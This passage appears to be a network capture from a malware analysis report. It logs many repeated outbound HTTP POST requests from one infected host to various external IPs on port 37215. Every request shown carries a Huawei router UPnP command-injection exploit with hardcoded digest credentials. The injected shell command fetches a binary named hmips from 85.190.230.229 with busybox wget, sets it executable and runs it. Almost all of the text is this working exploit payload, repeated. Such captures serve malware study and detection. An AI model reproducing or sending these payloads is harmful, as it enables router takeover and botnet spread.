                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.489998102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.225941896 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      131192.168.2.1439532156.192.107.21537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.884360075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      132192.168.2.144230441.166.153.12437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.886826992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      133192.168.2.144005441.180.192.8737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.891701937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.490000010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.193938971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      134192.168.2.143414641.221.218.24237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.892743111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      135192.168.2.144293841.120.180.8237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:07.895991087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.005948067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
